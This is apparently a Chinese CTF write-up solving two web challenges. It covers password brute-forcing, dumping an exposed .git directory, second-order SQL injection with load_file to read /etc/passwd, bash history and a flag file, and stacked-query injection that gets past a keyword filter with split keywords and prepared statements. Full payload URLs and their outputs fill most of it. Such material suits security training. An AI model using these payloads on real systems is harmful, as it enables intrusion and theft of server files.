http://47.102.141.139:8307

首先dirbuster扫一波,发现有login.php和.git目录
先去login.php,告诉名字是zhangwei,密码可以用brupsuite的intruder模块爆破
先随便输个密码sign in抓包

图片

图片


将包丢到intruder模块里,在position设置参数
图片

图片


再到payload设置爆破方式,load一个包含数字字母大小写和字符的字典,然后start attack
图片

图片


跑得比较慢,字典比较大,因为也没有hint提示这三位是什么,只能都跑一遍了,最后跑出来是zhangwei666
登进去后可以正常发帖,有 title category content ,详情里还有个content
打开控制台有惊喜 程序员GIT写一半跑路了,都没来得及Commit :)
用githack跑出来半个write_do.php
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
<?php
include "mysql.php";
session_start();
if($_SESSION['login'] != 'yes'){
header("Location: ./login.php");
die();
}
if(isset($_GET['do'])){
switch ($_GET['do'])
{
case 'write':
break;
case 'comment':
break;
default:
header("Location: ./index.php");
}
}
else{
header("Location: ./index.php");
}
?>

用gittool工具里的Dumper和Extractor获得完整源码

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
root@Damyayayayaya:/home/GitTools-master/Dumper# bash gitdumper.sh http://47.102.141.139:8307/.git/ write
###########
# GitDumper is part of https://github.com/internetwache/GitTools
#
# Developed and maintained by @gehaxelt from @internetwache
#
# Use at your own risk. Usage might be illegal in certain circumstances.
# Only for educational purposes!
###########


[+] Downloaded: HEAD
[-] Downloaded: objects/info/packs
[+] Downloaded: description
[+] Downloaded: config
[+] Downloaded: COMMIT_EDITMSG
[+] Downloaded: index
[-] Downloaded: packed-refs
[+] Downloaded: refs/heads/master
[-] Downloaded: refs/remotes/origin/HEAD
[+] Downloaded: refs/stash
[+] Downloaded: logs/HEAD
[+] Downloaded: logs/refs/heads/master
[-] Downloaded: logs/refs/remotes/origin/HEAD
[-] Downloaded: info/refs
[+] Downloaded: info/exclude
[+] Downloaded: objects/bf/bdf218902476c5c6164beedd8d2fcf593ea23b
[+] Downloaded: objects/e5/b2a2443c2b6d395d06960123142bc91123148c
[-] Downloaded: objects/00/00000000000000000000000000000000000000
[+] Downloaded: objects/2a/d429743f51d38f0d2cf9540ba22720cc6b2f2b
[+] Downloaded: objects/76/9905f5a6f425ce62ed9a1cbf375a61fb56b406
[+] Downloaded: objects/55/56e3ad3f21a0cf5938e26985a04ce3aa73faaf
[+] Downloaded: objects/56/dfc20e665f434b97f34ff4dc85782ae93cf1a4
[+] Downloaded: objects/8e/f569f235780f24c42b60f50d528a03f7238c80

root@Damyayayayaya:/home/GitTools-master/Extractor# ./extractor.sh ../Dumper/write/ ../Dumper/write/
###########
# Extractor is part of https://github.com/internetwache/GitTools
#
# Developed and maintained by @gehaxelt from @internetwache
#
# Use at your own risk. Usage might be illegal in certain circumstances.
# Only for educational purposes!
###########
[+] Found commit: bfbdf218902476c5c6164beedd8d2fcf593ea23b
[+] Found file: /home/GitTools-master/Extractor/../Dumper/write//0-bfbdf218902476c5c6164beedd8d2fcf593ea23b/write_do.php
[+] Found commit: e5b2a2443c2b6d395d06960123142bc91123148c
[+] Found file: /home/GitTools-master/Extractor/../Dumper/write//1-e5b2a2443c2b6d395d06960123142bc91123148c/write_do.php
[+] Found commit: 5556e3ad3f21a0cf5938e26985a04ce3aa73faaf
[+] Found file: /home/GitTools-master/Extractor/../Dumper/write//2-5556e3ad3f21a0cf5938e26985a04ce3aa73faaf/write_do.php

root@Damyayayayaya:/home/GitTools-master/Dumper/write/1-e5b2a2443c2b6d395d06960123142bc91123148c# cat write_do.php

以下是源码,开始审计

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
<?php
include "mysql.php";
session_start();
if($_SESSION['login'] != 'yes'){
header("Location: ./login.php");
die();
}
if(isset($_GET['do'])){
switch ($_GET['do'])
{
case 'write':
$category = addslashes($_POST['category']);
$title = addslashes($_POST['title']);
$content = addslashes($_POST['content']);
$sql = "insert into board
set category = '$category',
title = '$title',
content = '$content'";
$result = mysql_query($sql);
header("Location: ./index.php");
break;
case 'comment':
$bo_id = addslashes($_POST['bo_id']);
$sql = "select category from board where id='$bo_id'";
$result = mysql_query($sql);
$num = mysql_num_rows($result);
if($num>0){
$category = mysql_fetch_array($result)['category'];
$content = addslashes($_POST['content']);
$sql = "insert into comment
set category = '$category',
content = '$content',
bo_id = '$bo_id'";
$result = mysql_query($sql);
}
header("Location: ./comment.php?id=$bo_id");
break;
default:
header("Location: ./index.php");
}
}
else{
header("Location: ./index.php");
}
?>

这道题要post三个变量,在发帖页面是title category content,详情页面是content,也就是说要两个content形成闭合并注释掉后面的数据,用闭合的语句来执行数据库的查询(即二次注入),要注意发帖页面的category其实是content,查询语句要在这里写
语句构造很容易理解,例如
‘, content=(select load_file(‘//etc/passwd’)),/*
然后留言的时候只需要闭合这个就可以执行content的语句
‘, content=(select load_file(‘//etc/passwd’)),/**/#
就可以查询到当前的系统中所有的用户和用户的主要信息

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
root:x:0:0:root:/root:/bin/bash 
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting
System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
libuuid:x:100:101::/var/lib/libuuid:
syslog:x:101:104::/home/syslog:/bin/false
mysql:x:102:105:MySQL
Server,,,:/var/lib/mysql:/bin/false
www:x:500:500:www:/home/www:/bin/bash

那么多伪用户都nologin,只有最后一个www用户看起来是正常的,查他的命令历史记录
‘, content=(select load_file(‘//home/www/.bash_history’)),/**/#

1
2
3
4
5
6
cd /tmp/ unzip html.zip 
rm -f html.zip
cp -r html /var/www/
cd /var/www/html/
rm -f .DS_Store
service apache2 start

他在启动服务器前到/tmp/目录解压了html.zip,删除压缩包后将html移到/var/www/目录下,再把.DS_Store数据表删了,也就是说在/tmp/目录下.DS_Store数据表还在,继续查表(不加hex会显示乱码)

‘,content=(select hex(load_file(‘//tmp/html/.DS_Store’))),/**/#

得到一大串hex码,丢进notepad里转ascil码,得到一个 flag_8946e1ff1ee3e40f.php
读一下这个文件,老方法
‘,content=(select hex(load_file(‘//var/www/html/flag_8946e1ff1ee3e40f.php’))),/**/#
丢进notepad里转码,得到flag

1
2
3
<?php
$flag="flag{wdb2018_truncation_sql_inject}";
?>

http://47.102.141.139:8302

首先看源码,没有东西,提交后出现php数组,想到可以构造mysql语句报错查数据库
select databases 报错

1
return preg_match("/select|update|delete|drop|insert|where|\./i",$inject);

过滤了很多查数据库的命令,正则/i过滤大小写,第一反应没有限制show,就用show查库
http://47.102.141.139:8302/?inject=1';show databases;#
‘;闭合前部分,#注释后部分,查出库名

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
array(1) {
[0]=>
string(11) "ctftraining"
}

array(1) {
[0]=>
string(18) "information_schema"
}

array(1) {
[0]=>
string(5) "mysql"
}

array(1) {
[0]=>
string(18) "performance_schema"
}

array(1) {
[0]=>
string(9) "supersqli"
}

array(1) {
[0]=>
string(4) "test"
}

继续查supersqli表,出现一串数字组
http://47.102.141.139:8302/?inject=1';show tables from supersqli;#

1
2
3
4
5
6
7
8
9
array(1) {
[0]=>
string(16) "1919810931114514"
}

array(1) {
[0]=>
string(5) "words"
}

想继续用show查字段名无回显了,然后有三种办法,一是预编译slect查flag,二是alter方法修改表名直接读取flag,三是将过滤词拆分绕过select
我用的第三种,因为最简单而且我以前做题用到过,可以将要执行的sql语句进行拼接(也可以一句句来),将过滤的sql关键字拆分绕过检测

1
http://47.102.141.139:8302/?inject=1';use information_schema;set @sql=concat('s','elect column_name from columns wher','e table_name="1919810931114514"');PREPARE stmt1 FROM @sql;EXECUTE stmt1;--+

通过执行sql语句发现1919810931114514表当中存在flag字段

1
2
3
4
array(1) {
[0]=>
string(4) "flag"
}

直接在上一个语句的基础上构造payload
http://47.102.141.139:8302/?inject=1';use supersqli;set @sql=concat(‘s’,’elect flag from 1919810931114514‘);PREPARE stmt1 FROM @sql;EXECUTE stmt1;–+
(预处理语句,如果查询内容不存在,会引发一个错误)
得到flag

1
2
3
4
array(1) {
[0]=>
string(32) "flag{glzjin_wants_a_girl_firend}"
}

另两种方法对着别人的wp也复现了一下

  • 预编译slect查flag
1
2
3
set @sql=concat('sel','ect * from `1919810931114514`');prepare presql from @sql;execute presql;deallocate prepare presql;
// 提示:strstr($inject, "set") && strstr($inject, "prepare")
// 用 strstr 来匹配关键字,直接大小写关键字即可绕过

payload: http://47.102.141.139:8302/?inject=1'%3bSet+%40sqll%3dconcat('sel','ect+*+from+`1919810931114514`')%3bPrepare+presql+from+%40sqll%3bexecute+presql%3bdeallocate+Prepare+presql%3b%23

  • alter方法修改表名直接读取flag

先加id列 http://47.102.141.139:8302/?inject=1';alter+table+`1919810931114514`+rename+to+`damya`;alter+table+`words`+rename+to+`damya3`;alter+table+`damya`+rename+to+`words`;%23
payload: http://47.102.141.139:8302/?inject=1';ALTER TABLE 1919810931114514 ADD id INT(1) NOT NULL DEFAULT ‘1’ AFTER flag;%23